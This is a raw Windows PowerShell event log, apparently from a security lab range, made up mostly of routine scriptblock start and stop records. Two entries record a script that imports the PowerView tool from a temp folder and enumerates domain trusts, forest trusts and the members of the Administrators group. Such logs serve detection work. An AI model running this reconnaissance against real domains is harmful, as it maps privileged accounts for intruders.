SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479122
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8faadcd1-3dea-4458-8472-b1160be9937d
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479121
Keywords=None
Message=Started invocation of ScriptBlock ID: 8faadcd1-3dea-4458-8472-b1160be9937d
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479120
Keywords=None
Message=Completed invocation of ScriptBlock ID: c7f999b9-b820-4bcd-a832-337a3cc509de
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479119
Keywords=None
Message=Started invocation of ScriptBlock ID: c7f999b9-b820-4bcd-a832-337a3cc509de
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479118
Keywords=None
Message=Completed invocation of ScriptBlock ID: 13b71ddf-012c-4345-9fa9-bf2ef98d9efe
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479117
Keywords=None
Message=Started invocation of ScriptBlock ID: 13b71ddf-012c-4345-9fa9-bf2ef98d9efe
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479116
Keywords=None
Message=Completed invocation of ScriptBlock ID: b562d7d2-6d9a-4e2d-a8c0-4241cf339baf
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479115
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4e0c54f3-34a6-4c4f-9f61-396fe0b876e5
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479114
Keywords=None
Message=Started invocation of ScriptBlock ID: 4e0c54f3-34a6-4c4f-9f61-396fe0b876e5
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479113
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 4e0c54f3-34a6-4c4f-9f61-396fe0b876e5
Path:
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479112
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1db2c21c-dbd4-46a3-83e8-ab8f87ec335c
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479111
Keywords=None
Message=Started invocation of ScriptBlock ID: 1db2c21c-dbd4-46a3-83e8-ab8f87ec335c
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479110
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: 1db2c21c-dbd4-46a3-83e8-ab8f87ec335c
Path:
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479109
Keywords=None
Message=Completed invocation of ScriptBlock ID: 72d51893-6d0e-4155-b10c-ac291f019b87
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479108
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8f461449-4591-4889-b68e-9a9ef79f7349
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479107
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9e2ecaae-61b9-4523-a786-8277d8a4bd32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479106
Keywords=None
Message=Started invocation of ScriptBlock ID: 9e2ecaae-61b9-4523-a786-8277d8a4bd32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479105
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: 9e2ecaae-61b9-4523-a786-8277d8a4bd32
Path:
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479104
Keywords=None
Message=Started invocation of ScriptBlock ID: 8f461449-4591-4889-b68e-9a9ef79f7349
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479103
Keywords=None
Message=Started invocation of ScriptBlock ID: 72d51893-6d0e-4155-b10c-ac291f019b87
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479102
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 72d51893-6d0e-4155-b10c-ac291f019b87
Path:
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479101
Keywords=None
Message=Started invocation of ScriptBlock ID: b562d7d2-6d9a-4e2d-a8c0-4241cf339baf
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479100
Keywords=None
Message=Completed invocation of ScriptBlock ID: 519ecd82-864b-41a0-863d-86133c57dc32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479099
Keywords=None
Message=Started invocation of ScriptBlock ID: 519ecd82-864b-41a0-863d-86133c57dc32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479098
Keywords=None
Message=Started invocation of ScriptBlock ID: 555db5c0-165a-4c5d-89f1-436f144e398f
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479097
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{Import-Module "$env:TEMP\PowerView.ps1"
Get-NetDomainTrust
Get-NetForestTrust
Get-ADDomain
Get-ADGroupMember Administrators -Recursive}

ScriptBlock ID: 555db5c0-165a-4c5d-89f1-436f144e398f
Path:
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479096
Keywords=None
Message=Started invocation of ScriptBlock ID: 72ee6361-ee46-490f-9551-eafa1316ce14
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479095
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {Import-Module "$env:TEMP\PowerView.ps1"
Get-NetDomainTrust
Get-NetForestTrust
Get-ADDomain
Get-ADGroupMember Administrators -Recursive}

ScriptBlock ID: 72ee6361-ee46-490f-9551-eafa1316ce14
Path:
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1479094
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1479093
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 6624 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1479092
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479091
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479090
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479089
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479088
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479087
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479086
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479085
Keywords=None
Message=Completed invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479084
Keywords=None
Message=Started invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479083
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479082
Keywords=None
Message=Started invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479081
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479080
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479079
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479078
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479077
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479076
Keywords=None
Message=Started invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479075
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479074
Keywords=None
Message=Completed invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479073
Keywords=None
Message=Started invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479072
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479071
Keywords=None
Message=Completed invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479070
Keywords=None
Message=Started invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479069
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479068
Keywords=None
Message=Started invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
